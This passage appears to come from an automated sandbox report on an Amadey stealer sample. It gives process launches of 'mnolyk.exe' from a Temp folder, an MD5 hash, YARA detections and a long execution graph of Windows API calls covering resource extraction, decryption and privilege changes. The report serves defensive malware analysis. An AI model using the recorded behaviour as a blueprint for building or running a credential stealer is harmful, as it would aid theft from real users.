                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Target ID:30
                          Start time:20:03:00
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Target ID:31
                          Start time:20:04:00
                          Start date:07/02/2023
                          Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Imagebase:0x980000
                          File size:241664 bytes
                          MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                          Reset < >

                            Execution Graph

                            Execution Coverage:26.5%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:29.6%
                            Total number of Nodes:968
                            Total number of Limit Nodes:41
                            execution_graph 3122 eb6bef _XcptFilter 2196 eb6a60 2197 eb6a65 2196->2197 2198 eb6a76 GetStartupInfoW 2197->2198 2199 eb6a93 2198->2199 2200 eb6aa8 2199->2200 2201 eb6aaf Sleep 2199->2201 2202 eb6ac7 _amsg_exit 2200->2202 2204 eb6ad1 2200->2204 2201->2199 2202->2204 2203 eb6b13 _initterm 2207 eb6b2e __IsNonwritableInCurrentImage 2203->2207 2204->2203 2206 eb6af4 2204->2206 2204->2207 2205 eb6bd6 _ismbblead 2205->2207 2207->2205 2209 eb6c1e 2207->2209 2210 eb6bbe exit 2207->2210 2212 eb2bfb GetVersion 2207->2212 2209->2206 2211 eb6c27 _cexit 2209->2211 2210->2207 2211->2206 2213 eb2c0f 2212->2213 2214 eb2c50 2212->2214 2213->2214 2215 eb2c13 GetModuleHandleW 2213->2215 2229 eb2caa memset memset memset 2214->2229 2215->2214 2217 eb2c22 GetProcAddress 2215->2217 2217->2214 2226 eb2c34 2217->2226 2219 eb2c8e 2220 eb2c9e 2219->2220 2221 eb2c97 CloseHandle 2219->2221 2220->2207 2221->2220 2226->2214 2227 eb2c89 2324 eb1f90 2227->2324 2341 eb468f FindResourceA SizeofResource 2229->2341 2232 eb2e30 2235 eb44b9 20 API calls 2232->2235 2233 eb2d2d CreateEventA SetEvent 2234 eb468f 7 API calls 2233->2234 2236 eb2d57 2234->2236 2237 eb2f06 2235->2237 2238 eb2d5b 2236->2238 2239 eb2d7d 2236->2239 2346 eb6ce0 2237->2346 2351 eb44b9 2238->2351 2241 eb2e1f 2239->2241 2244 eb468f 7 API calls 2239->2244 2380 eb5c9e 2241->2380 2247 eb2d9f 2244->2247 2245 eb2c62 2245->2219 2270 eb2f1d 2245->2270 2247->2238 2249 eb2da3 CreateMutexA 2247->2249 2248 eb2e3a 2250 eb2e43 2248->2250 2251 eb2e52 FindResourceA 2248->2251 2249->2241 2252 eb2dbd GetLastError 2249->2252 2406 eb2390 2250->2406 2255 eb2e6e 2251->2255 2256 eb2e64 LoadResource 2251->2256 2252->2241 2254 eb2dca 2252->2254 2258 eb2dea 2254->2258 2259 eb2dd5 2254->2259 2257 eb2d6e 2255->2257 2421 eb36ee GetVersionExA 2255->2421 2256->2255 2257->2237 2261 eb44b9 20 API calls 2258->2261 2260 eb44b9 20 API calls 2259->2260 2262 eb2de8 2260->2262 2263 eb2dff 2261->2263 2265 eb2e04 CloseHandle 2262->2265 2263->2241 2263->2265 2265->2237 2271 eb2f3f 2270->2271 2272 eb2f6c 2270->2272 2273 eb2f5f 2271->2273 2545 eb51e5 2271->2545 2565 eb5164 2272->2565 2698 eb3a3f 2273->2698 2277 eb2f71 2280 eb3041 2277->2280 2580 eb55a0 2277->2580 2282 eb6ce0 4 API calls 2280->2282 2284 eb2c6b 2282->2284 2311 eb52b6 2284->2311 2285 eb2f86 GetSystemDirectoryA 2286 eb658a CharPrevA 2285->2286 2287 eb2fab LoadLibraryA 2286->2287 2288 eb2fc0 GetProcAddress 2287->2288 2289 eb2ff7 FreeLibrary 2287->2289 2288->2289 2290 eb2fd6 DecryptFileA 2288->2290 2291 eb3017 SetCurrentDirectoryA 2289->2291 2292 eb3006 2289->2292 2290->2289 2299 eb2ff0 2290->2299 2293 eb3026 2291->2293 2294 eb3054 2291->2294 2292->2291 2630 eb621e GetWindowsDirectoryA 2292->2630 2298 eb44b9 20 API calls 2293->2298 2296 eb3061 2294->2296 2641 eb3b26 2294->2641 2296->2280 2301 eb307a 2296->2301 2650 eb256d 2296->2650 2303 eb3037 2298->2303 2299->2289 2306 eb3098 2301->2306 2661 eb3ba2 2301->2661 2717 eb6285 GetLastError 2303->2717 2306->2280 2309 eb30af 2306->2309 2719 eb4169 2309->2719 2312 eb5316 2311->2312 2313 eb52d6 2311->2313 2317 eb5374 2312->2317 2321 eb535e SetCurrentDirectoryA 2312->2321 2322 eb65e8 4 API calls 2312->2322 2314 eb5300 LocalFree LocalFree 2313->2314 2316 eb52eb SetFileAttributesA DeleteFileA 2313->2316 2314->2312 2314->2313 2315 eb538c 2318 eb6ce0 4 API calls 2315->2318 2316->2314 2317->2315 3052 eb1fe1 2317->3052 2320 eb2c72 2318->2320 2320->2219 2320->2227 2323 eb2390 13 API calls 2321->2323 2322->2321 2323->2317 2325 eb1f9a 2324->2325 2326 eb1f9f 2324->2326 2327 eb1ea7 15 API calls 2325->2327 2328 eb1fc0 2326->2328 2329 eb44b9 20 API calls 2326->2329 2332 eb1fd9 2326->2332 2327->2326 2330 eb1ee2 GetCurrentProcess OpenProcessToken 2328->2330 2331 eb1fcf ExitWindowsEx 2328->2331 2328->2332 2329->2328 2334 eb1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2330->2334 2335 eb1f0e 2330->2335 2331->2332 2332->2219 2334->2335 2336 eb1f6b ExitWindowsEx 2334->2336 2338 eb44b9 20 API calls 2335->2338 2336->2335 2337 eb1f1f 2336->2337 2339 eb6ce0 4 API calls 2337->2339 2338->2337 2340 eb1f8c 2339->2340 2340->2219 2342 eb2d1a 2341->2342 2343 eb46b6 2341->2343 2342->2232 2342->2233 2343->2342 2344 eb46be FindResourceA LoadResource LockResource 2343->2344 2344->2342 2345 eb46df memcpy_s FreeResource 2344->2345 2345->2342 2347 eb6ceb 2346->2347 2348 eb6ce8 2346->2348 2463 eb6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2347->2463 2348->2245 2350 eb6e26 2350->2245 2352 eb455a 2351->2352 2353 eb44fe LoadStringA 2351->2353 2357 eb6ce0 4 API calls 2352->2357 2354 eb4562 2353->2354 2355 eb4527 2353->2355 2360 eb45c9 2354->2360 2366 eb457e 2354->2366 2464 eb681f 2355->2464 2359 eb4689 2357->2359 2359->2257 2363 eb45cd LocalAlloc 2360->2363 2364 eb4607 LocalAlloc 2360->2364 2361 eb4536 MessageBoxA 2361->2352 2363->2352 2370 eb45f3 2363->2370 2364->2352 2376 eb45c4 2364->2376 2366->2366 2369 eb4596 LocalAlloc 2366->2369 2368 eb462d MessageBeep 2371 eb681f 10 API calls 2368->2371 2369->2352 2372 eb45af 2369->2372 2373 eb171e _vsnprintf 2370->2373 2374 eb463b 2371->2374 2481 eb171e 2372->2481 2373->2376 2377 eb4645 MessageBoxA LocalFree 2374->2377 2378 eb67c9 EnumResourceLanguagesA 2374->2378 2376->2368 2377->2352 2378->2377 2386 eb5e17 2380->2386 2390 eb5cc3 2380->2390 2381 eb6ce0 4 API calls 2383 eb2e2c 2381->2383 2382 eb5ced CharNextA 2382->2390 2383->2232 2383->2248 2384 eb5dec GetModuleFileNameA 2385 eb5e0a 2384->2385 2384->2386 2491 eb66c8 2385->2491 2386->2381 2388 eb6218 2500 eb6e2a 2388->2500 2390->2382 2390->2386 2390->2388 2392 eb5e36 CharUpperA 2390->2392 2398 eb5dd0 2390->2398 2399 eb5f9f CharUpperA 2390->2399 2400 eb5f59 CompareStringA 2390->2400 2401 eb6003 CharUpperA 2390->2401 2402 eb5edc CharUpperA 2390->2402 2403 eb60a2 CharUpperA 2390->2403 2404 eb667f IsDBCSLeadByte CharNextA 2390->2404 2496 eb658a 2390->2496 2392->2390 2393 eb61d0 2392->2393 2394 eb44b9 20 API calls 2393->2394 2395 eb61e7 2394->2395 2396 eb61f0 CloseHandle 2395->2396 2397 eb61f7 ExitProcess 2395->2397 2396->2397 2398->2384 2398->2386 2399->2390 2400->2390 2401->2390 2402->2390 2403->2390 2404->2390 2407 eb24cb 2406->2407 2410 eb23b9 2406->2410 2408 eb6ce0 4 API calls 2407->2408 2409 eb24dc 2408->2409 2409->2257 2410->2407 2411 eb23e9 FindFirstFileA 2410->2411 2411->2407 2419 eb2407 2411->2419 2412 eb2479 2416 eb2488 SetFileAttributesA DeleteFileA 2412->2416 2413 eb2421 lstrcmpA 2414 eb24a9 FindNextFileA 2413->2414 2415 eb2431 lstrcmpA 2413->2415 2417 eb24bd FindClose RemoveDirectoryA 2414->2417 2414->2419 2415->2414 2415->2419 2416->2414 2417->2407 2418 eb658a CharPrevA 2418->2419 2419->2412 2419->2413 2419->2414 2419->2418 2420 eb2390 5 API calls 2419->2420 2420->2419 2426 eb3737 2421->2426 2427 eb372d 2421->2427 2422 eb44b9 20 API calls 2423 eb39fc 2422->2423 2424 eb6ce0 4 API calls 2423->2424 2425 eb2e92 2424->2425 2425->2237 2425->2257 2436 eb18a3 2425->2436 2426->2423 2426->2427 2429 eb38a4 2426->2429 2507 eb28e8 2426->2507 2427->2422 2427->2423 2429->2423 2429->2427 2430 eb39c1 MessageBeep 2429->2430 2431 eb681f 10 API calls 2430->2431 2432 eb39ce 2431->2432 2433 eb39d8 MessageBoxA 2432->2433 2434 eb67c9 EnumResourceLanguagesA 2432->2434 2433->2423 2434->2433 2437 eb19b8 2436->2437 2438 eb18d5 2436->2438 2440 eb6ce0 4 API calls 2437->2440 2536 eb17ee LoadLibraryA 2438->2536 2442 eb19d5 2440->2442 2442->2257 2456 eb6517 FindResourceA 2442->2456 2443 eb18e5 GetCurrentProcess OpenProcessToken 2443->2437 2444 eb1900 GetTokenInformation 2443->2444 2445 eb19aa CloseHandle 2444->2445 2446 eb1918 GetLastError 2444->2446 2445->2437 2446->2445 2447 eb1927 LocalAlloc 2446->2447 2448 eb19a9 2447->2448 2449 eb1938 GetTokenInformation 2447->2449 2448->2445 2450 eb194e AllocateAndInitializeSid 2449->2450 2451 eb19a2 LocalFree 2449->2451 2450->2451 2455 eb196e 2450->2455 2451->2448 2452 eb1999 FreeSid 2452->2451 2453 eb1975 EqualSid 2454 eb198c 2453->2454 2453->2455 2454->2452 2455->2452 2455->2453 2455->2454 2457 eb656b 2456->2457 2458 eb6536 LoadResource 2456->2458 2459 eb44b9 20 API calls 2457->2459 2458->2457 2460 eb6544 DialogBoxIndirectParamA FreeResource 2458->2460 2461 eb657c 2459->2461 2460->2457 2460->2461 2461->2257 2463->2350 2465 eb6857 GetVersionExA 2464->2465 2474 eb691a 2464->2474 2467 eb687c 2465->2467 2465->2474 2466 eb6ce0 4 API calls 2468 eb452c 2466->2468 2469 eb68a5 GetSystemMetrics 2467->2469 2467->2474 2468->2361 2475 eb67c9 2468->2475 2470 eb68b5 RegOpenKeyExA 2469->2470 2469->2474 2471 eb68d6 RegQueryValueExA RegCloseKey 2470->2471 2470->2474 2472 eb690c 2471->2472 2471->2474 2485 eb66f9 2472->2485 2474->2466 2476 eb67e2 2475->2476 2480 eb6803 2475->2480 2489 eb6793 EnumResourceLanguagesA 2476->2489 2478 eb67f5 2478->2480 2490 eb6793 EnumResourceLanguagesA 2478->2490 2480->2361 2482 eb172d 2481->2482 2483 eb173d _vsnprintf 2482->2483 2484 eb175d 2482->2484 2483->2484 2484->2376 2486 eb670f 2485->2486 2487 eb6740 CharNextA 2486->2487 2488 eb674b 2486->2488 2487->2486 2488->2474 2489->2478 2490->2480 2492 eb66d5 2491->2492 2493 eb66f3 2492->2493 2495 eb66e5 CharNextA 2492->2495 2503 eb6648 2492->2503 2493->2386 2495->2492 2497 eb659b 2496->2497 2498 eb65ab 2497->2498 2499 eb65b8 CharPrevA 2497->2499 2498->2390 2499->2498 2506 eb6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2500->2506 2502 eb621d 2504 eb665d IsDBCSLeadByte 2503->2504 2505 eb6668 2503->2505 2504->2505 2505->2492 2506->2502 2508 eb2a62 2507->2508 2515 eb290d 2507->2515 2509 eb2a6e GlobalFree 2508->2509 2510 eb2a75 2508->2510 2509->2510 2510->2429 2512 eb2955 GlobalAlloc 2512->2508 2513 eb2968 GlobalLock 2512->2513 2513->2508 2513->2515 2514 eb2a20 GlobalUnlock 2514->2515 2515->2508 2515->2512 2515->2514 2516 eb2a80 GlobalUnlock 2515->2516 2517 eb2773 2515->2517 2516->2508 2518 eb27a3 CharUpperA CharNextA CharNextA 2517->2518 2519 eb28b2 2517->2519 2520 eb27db 2518->2520 2521 eb28b7 GetSystemDirectoryA 2518->2521 2519->2521 2522 eb28a8 GetWindowsDirectoryA 2520->2522 2523 eb27e3 2520->2523 2524 eb28bf 2521->2524 2522->2524 2528 eb658a CharPrevA 2523->2528 2525 eb28d2 2524->2525 2526 eb658a CharPrevA 2524->2526 2527 eb6ce0 4 API calls 2525->2527 2526->2525 2529 eb28e2 2527->2529 2530 eb2810 RegOpenKeyExA 2528->2530 2529->2515 2530->2524 2531 eb2837 RegQueryValueExA 2530->2531 2532 eb289a RegCloseKey 2531->2532 2533 eb285c 2531->2533 2532->2524 2534 eb2867 ExpandEnvironmentStringsA 2533->2534 2535 eb287a 2533->2535 2534->2535 2535->2532 2537 eb1890 2536->2537 2538 eb1826 GetProcAddress 2536->2538 2541 eb6ce0 4 API calls 2537->2541 2539 eb1889 FreeLibrary 2538->2539 2540 eb1839 AllocateAndInitializeSid 2538->2540 2539->2537 2540->2539 2543 eb185f FreeSid 2540->2543 2542 eb189f 2541->2542 2542->2437 2542->2443 2543->2539 2546 eb468f 7 API calls 2545->2546 2547 eb51f9 LocalAlloc 2546->2547 2548 eb522d 2547->2548 2549 eb520d 2547->2549 2550 eb468f 7 API calls 2548->2550 2551 eb44b9 20 API calls 2549->2551 2552 eb523a 2550->2552 2553 eb521e 2551->2553 2554 eb523e 2552->2554 2555 eb5262 lstrcmpA 2552->2555 2556 eb6285 GetLastError 2553->2556 2557 eb44b9 20 API calls 2554->2557 2558 eb527e 2555->2558 2559 eb5272 LocalFree 2555->2559 2564 eb5223 2556->2564 2561 eb524f LocalFree 2557->2561 2562 eb44b9 20 API calls 2558->2562 2560 eb2f4d 2559->2560 2560->2272 2560->2273 2560->2280 2561->2560 2563 eb5290 LocalFree 2562->2563 2563->2564 2564->2560 2566 eb468f 7 API calls 2565->2566 2567 eb5175 2566->2567 2568 eb517a 2567->2568 2569 eb51af 2567->2569 2571 eb44b9 20 API calls 2568->2571 2570 eb468f 7 API calls 2569->2570 2572 eb51c0 2570->2572 2573 eb518d 2571->2573 2732 eb6298 2572->2732 2573->2277 2577 eb51ce 2579 eb44b9 20 API calls 2577->2579 2578 eb51e1 2578->2277 2579->2573 2581 eb468f 7 API calls 2580->2581 2582 eb55c7 LocalAlloc 2581->2582 2583 eb55db 2582->2583 2584 eb55fd 2582->2584 2586 eb44b9 20 API calls 2583->2586 2585 eb468f 7 API calls 2584->2585 2587 eb560a 2585->2587 2588 eb55ec 2586->2588 2589 eb560e 2587->2589 2590 eb5632 lstrcmpA 2587->2590 2591 eb6285 GetLastError 2588->2591 2592 eb44b9 20 API calls 2589->2592 2593 eb564b LocalFree 2590->2593 2594 eb5645 2590->2594 2613 eb55f1 2591->2613 2596 eb561f LocalFree 2592->2596 2597 eb565b 2593->2597 2598 eb5696 2593->2598 2594->2593 2595 eb55f6 2601 eb6ce0 4 API calls 2595->2601 2596->2595 2605 eb5467 49 API calls 2597->2605 2599 eb589f 2598->2599 2602 eb56ae GetTempPathA 2598->2602 2600 eb6517 24 API calls 2599->2600 2600->2595 2603 eb2f7e 2601->2603 2604 eb56c3 2602->2604 2617 eb56eb 2602->2617 2603->2280 2603->2285 2744 eb5467 2604->2744 2607 eb5678 2605->2607 2607->2595 2608 eb5680 2607->2608 2610 eb44b9 20 API calls 2608->2610 2610->2613 2611 eb586c GetWindowsDirectoryA 2778 eb597d GetCurrentDirectoryA SetCurrentDirectoryA 2611->2778 2612 eb5717 GetDriveTypeA 2614 eb5730 GetFileAttributesA 2612->2614 2628 eb572b 2612->2628 2613->2595 2614->2628 2617->2595 2617->2611 2617->2612 2619 eb597d 34 API calls 2619->2628 2620 eb5467 49 API calls 2620->2617 2621 eb2630 21 API calls 2621->2628 2623 eb57c1 GetWindowsDirectoryA 2623->2628 2624 eb658a CharPrevA 2625 eb57e8 GetFileAttributesA 2624->2625 2626 eb57fa CreateDirectoryA 2625->2626 2625->2628 2626->2628 2627 eb5827 SetFileAttributesA 2627->2628 2628->2595 2628->2611 2628->2612 2628->2614 2628->2619 2628->2621 2628->2623 2628->2624 2628->2627 2629 eb5467 49 API calls 2628->2629 2774 eb6952 2628->2774 2629->2628 2631 eb6249 2630->2631 2632 eb6268 2630->2632 2633 eb44b9 20 API calls 2631->2633 2634 eb597d 34 API calls 2632->2634 2635 eb625a 2633->2635 2636 eb6277 2634->2636 2638 eb6285 GetLastError 2635->2638 2637 eb6ce0 4 API calls 2636->2637 2639 eb3013 2637->2639 2640 eb625f 2638->2640 2639->2280 2639->2291 2640->2636 2642 eb3b2d 2641->2642 2642->2642 2643 eb3b72 2642->2643 2645 eb3b53 2642->2645 2845 eb4fe0 2643->2845 2646 eb6517 24 API calls 2645->2646 2647 eb3b70 2646->2647 2648 eb6298 10 API calls 2647->2648 2649 eb3b7b 2647->2649 2648->2649 2649->2296 2651 eb2583 2650->2651 2652 eb2622 2650->2652 2654 eb25e8 RegOpenKeyExA 2651->2654 2657 eb258b 2651->2657 2899 eb24e0 GetWindowsDirectoryA 2652->2899 2655 eb2609 RegQueryInfoKeyA 2654->2655 2656 eb25e3 2654->2656 2658 eb25d1 RegCloseKey 2655->2658 2656->2301 2657->2656 2659 eb259b RegOpenKeyExA 2657->2659 2658->2656 2659->2656 2660 eb25bc RegQueryValueExA 2659->2660 2660->2658 2662 eb3bdb 2661->2662 2663 eb3bec 2661->2663 2665 eb468f 7 API calls 2662->2665 2664 eb3c03 memset 2663->2664 2666 eb3d13 2663->2666 2668 eb468f 7 API calls 2663->2668 2672 eb3d7b CompareStringA 2663->2672 2673 eb3fd7 2663->2673 2674 eb3f4d 2663->2674 2675 eb3fab 2663->2675 2680 eb3f1e LocalFree 2663->2680 2681 eb3f46 LocalFree 2663->2681 2684 eb3cc7 CompareStringA 2663->2684 2695 eb3e10 2663->2695 2907 eb1ae8 2663->2907 2947 eb202a memset memset RegCreateKeyExA 2663->2947 2973 eb3fef 2663->2973 2664->2663 2665->2663 2667 eb44b9 20 API calls 2666->2667 2694 eb3d26 2667->2694 2668->2663 2670 eb6ce0 4 API calls 2671 eb3f60 2670->2671 2671->2306 2672->2663 2672->2673 2673->2674 2997 eb2267 2673->2997 2674->2670 2678 eb44b9 20 API calls 2675->2678 2679 eb3fbe LocalFree 2678->2679 2679->2674 2680->2663 2680->2673 2681->2674 2684->2663 2685 eb3e1f GetProcAddress 2687 eb3f64 2685->2687 2685->2695 2686 eb3f92 2688 eb44b9 20 API calls 2686->2688 2689 eb44b9 20 API calls 2687->2689 2690 eb3fa9 2688->2690 2691 eb3f75 FreeLibrary 2689->2691 2692 eb3f7c LocalFree 2690->2692 2691->2692 2693 eb6285 GetLastError 2692->2693 2693->2694 2694->2674 2695->2685 2695->2686 2696 eb3eff FreeLibrary 2695->2696 2697 eb3f40 FreeLibrary 2695->2697 2987 eb6495 2695->2987 2696->2680 2697->2681 2699 eb468f 7 API calls 2698->2699 2700 eb3a55 LocalAlloc 2699->2700 2701 eb3a8e 2700->2701 2702 eb3a6c 2700->2702 2704 eb468f 7 API calls 2701->2704 2703 eb44b9 20 API calls 2702->2703 2705 eb3a7d 2703->2705 2706 eb3a98 2704->2706 2707 eb6285 GetLastError 2705->2707 2708 eb3a9c 2706->2708 2709 eb3ac5 lstrcmpA 2706->2709 2714 eb2f64 2707->2714 2710 eb44b9 20 API calls 2708->2710 2711 eb3ada 2709->2711 2712 eb3b0d LocalFree 2709->2712 2715 eb3aad LocalFree 2710->2715 2713 eb6517 24 API calls 2711->2713 2712->2714 2716 eb3aec LocalFree 2713->2716 2714->2272 2714->2280 2715->2714 2716->2714 2718 eb303c 2717->2718 2718->2280 2720 eb468f 7 API calls 2719->2720 2721 eb417d LocalAlloc 2720->2721 2722 eb41a8 2721->2722 2723 eb4195 2721->2723 2725 eb468f 7 API calls 2722->2725 2724 eb44b9 20 API calls 2723->2724 2728 eb41a6 2724->2728 2726 eb41b5 2725->2726 2727 eb41c5 lstrcmpA 2726->2727 2729 eb41b9 2726->2729 2727->2729 2730 eb41e6 LocalFree 2727->2730 2728->2280 2731 eb44b9 20 API calls 2729->2731 2730->2728 2731->2730 2733 eb171e _vsnprintf 2732->2733 2734 eb62c9 FindResourceA 2733->2734 2736 eb62cb LoadResource LockResource 2734->2736 2737 eb6353 2734->2737 2736->2737 2740 eb62e0 2736->2740 2738 eb6ce0 4 API calls 2737->2738 2739 eb51ca 2738->2739 2739->2577 2739->2578 2741 eb631b FreeResource 2740->2741 2742 eb6355 FreeResource 2740->2742 2743 eb171e _vsnprintf 2741->2743 2742->2737 2743->2734 2745 eb548a 2744->2745 2762 eb551a 2744->2762 2805 eb53a1 2745->2805 2747 eb5581 2751 eb6ce0 4 API calls 2747->2751 2750 eb5495 2750->2747 2754 eb550c 2750->2754 2755 eb54c2 GetSystemInfo 2750->2755 2756 eb559a 2751->2756 2752 eb553b CreateDirectoryA 2757 eb5577 2752->2757 2758 eb5547 2752->2758 2753 eb554d 2753->2747 2761 eb597d 34 API calls 2753->2761 2759 eb658a CharPrevA 2754->2759 2766 eb54da 2755->2766 2756->2595 2768 eb2630 GetWindowsDirectoryA 2756->2768 2760 eb6285 GetLastError 2757->2760 2758->2753 2759->2762 2763 eb557c 2760->2763 2764 eb555c 2761->2764 2816 eb58c8 2762->2816 2763->2747 2764->2747 2767 eb5568 RemoveDirectoryA 2764->2767 2765 eb658a CharPrevA 2765->2754 2766->2754 2766->2765 2767->2747 2769 eb266f 2768->2769 2770 eb265e 2768->2770 2772 eb6ce0 4 API calls 2769->2772 2771 eb44b9 20 API calls 2770->2771 2771->2769 2773 eb2687 2772->2773 2773->2617 2773->2620 2775 eb696e GetDiskFreeSpaceA 2774->2775 2776 eb69a1 2774->2776 2775->2776 2777 eb6989 MulDiv 2775->2777 2776->2628 2777->2776 2779 eb59bb 2778->2779 2780 eb59dd GetDiskFreeSpaceA 2778->2780 2781 eb44b9 20 API calls 2779->2781 2782 eb5ba1 memset 2780->2782 2783 eb5a21 MulDiv 2780->2783 2784 eb59cc 2781->2784 2785 eb6285 GetLastError 2782->2785 2783->2782 2786 eb5a50 GetVolumeInformationA 2783->2786 2787 eb6285 GetLastError 2784->2787 2788 eb5bbc GetLastError FormatMessageA 2785->2788 2789 eb5a6e memset 2786->2789 2790 eb5ab5 SetCurrentDirectoryA 2786->2790 2802 eb59d1 2787->2802 2791 eb5be3 2788->2791 2792 eb6285 GetLastError 2789->2792 2797 eb5acc 2790->2797 2793 eb44b9 20 API calls 2791->2793 2794 eb5a89 GetLastError FormatMessageA 2792->2794 2795 eb5bf5 SetCurrentDirectoryA 2793->2795 2794->2791 2798 eb5b94 2795->2798 2796 eb6ce0 4 API calls 2799 eb5c11 2796->2799 2800 eb5b0a 2797->2800 2803 eb5b20 2797->2803 2798->2796 2799->2617 2801 eb44b9 20 API calls 2800->2801 2801->2802 2802->2798 2803->2798 2828 eb268b 2803->2828 2807 eb53bf 2805->2807 2806 eb171e _vsnprintf 2806->2807 2807->2806 2808 eb658a CharPrevA 2807->2808 2811 eb5415 GetTempFileNameA 2807->2811 2809 eb53fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 eb544f CreateDirectoryA 2809->2810 2810->2811 2812 eb543a 2810->2812 2811->2812 2813 eb5429 DeleteFileA CreateDirectoryA 2811->2813 2814 eb6ce0 4 API calls 2812->2814 2813->2812 2815 eb5449 2814->2815 2815->2750 2817 eb58d8 2816->2817 2817->2817 2818 eb58df LocalAlloc 2817->2818 2819 eb5919 2818->2819 2820 eb58f3 2818->2820 2824 eb658a CharPrevA 2819->2824 2821 eb44b9 20 API calls 2820->2821 2822 eb5906 2821->2822 2823 eb6285 GetLastError 2822->2823 2827 eb5534 2822->2827 2823->2827 2825 eb5931 CreateFileA LocalFree 2824->2825 2825->2822 2826 eb595b CloseHandle GetFileAttributesA 2825->2826 2826->2822 2827->2752 2827->2753 2829 eb26b9 2828->2829 2830 eb26e5 2828->2830 2831 eb171e _vsnprintf 2829->2831 2832 eb26ea 2830->2832 2833 eb271f 2830->2833 2835 eb26cc 2831->2835 2836 eb171e _vsnprintf 2832->2836 2834 eb26e3 2833->2834 2838 eb171e _vsnprintf 2833->2838 2839 eb6ce0 4 API calls 2834->2839 2840 eb44b9 20 API calls 2835->2840 2837 eb26fd 2836->2837 2841 eb44b9 20 API calls 2837->2841 2842 eb2735 2838->2842 2843 eb276d 2839->2843 2840->2834 2841->2834 2844 eb44b9 20 API calls 2842->2844 2843->2798 2844->2834 2846 eb468f 7 API calls 2845->2846 2847 eb4ff5 FindResourceA LoadResource LockResource 2846->2847 2848 eb5020 2847->2848 2864 eb515f 2847->2864 2849 eb5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2849 2850 eb5057 2848->2850 2849->2850 2867 eb4efd 2850->2867 2853 eb507c 2856 eb50e8 2853->2856 2857 eb5106 2853->2857 2854 eb5060 2855 eb44b9 20 API calls 2854->2855 2861 eb5075 2855->2861 2858 eb44b9 20 API calls 2856->2858 2859 eb511d 2857->2859 2860 eb5110 FreeResource 2857->2860 2858->2861 2862 eb513a 2859->2862 2863 eb5129 2859->2863 2860->2859 2861->2857 2862->2864 2866 eb514c SendMessageA 2862->2866 2865 eb44b9 20 API calls 2863->2865 2864->2647 2865->2862 2866->2864 2868 eb4f4a 2867->2868 2869 eb4fa1 2868->2869 2875 eb4980 2868->2875 2871 eb6ce0 4 API calls 2869->2871 2872 eb4fc6 2871->2872 2872->2853 2872->2854 2876 eb4990 2875->2876 2877 eb49c2 lstrcmpA 2876->2877 2878 eb49a5 2876->2878 2880 eb4a0e 2877->2880 2881 eb49ba 2877->2881 2879 eb44b9 20 API calls 2878->2879 2879->2881 2880->2881 2886 eb487a 2880->2886 2881->2869 2883 eb4b60 2881->2883 2884 eb4b92 FindCloseChangeNotification 2883->2884 2885 eb4b76 2883->2885 2884->2885 2885->2869 2887 eb48a2 CreateFileA 2886->2887 2889 eb48e9 2887->2889 2890 eb4908 2887->2890 2889->2890 2891 eb48ee 2889->2891 2890->2881 2894 eb490c 2891->2894 2895 eb48f5 CreateFileA 2894->2895 2897 eb4917 2894->2897 2895->2890 2896 eb4962 CharNextA 2896->2897 2897->2895 2897->2896 2898 eb4953 CreateDirectoryA 2897->2898 2898->2896 2900 eb255b 2899->2900 2901 eb2510 2899->2901 2903 eb6ce0 4 API calls 2900->2903 2902 eb658a CharPrevA 2901->2902 2904 eb2522 WritePrivateProfileStringA _lopen 2902->2904 2905 eb2569 2903->2905 2904->2900 2906 eb2548 _llseek _lclose 2904->2906 2905->2656 2906->2900 2908 eb1b25 2907->2908 3011 eb1a84 2908->3011 2910 eb1b57 2911 eb658a CharPrevA 2910->2911 2913 eb1b8c 2910->2913 2911->2913 2912 eb66c8 2 API calls 2914 eb1bd1 2912->2914 2913->2912 2915 eb1bd9 CompareStringA 2914->2915 2916 eb1d73 2914->2916 2915->2916 2917 eb1bf7 GetFileAttributesA 2915->2917 2918 eb66c8 2 API calls 2916->2918 2919 eb1c0d 2917->2919 2920 eb1d53 2917->2920 2921 eb1d7d 2918->2921 2919->2920 2926 eb1a84 2 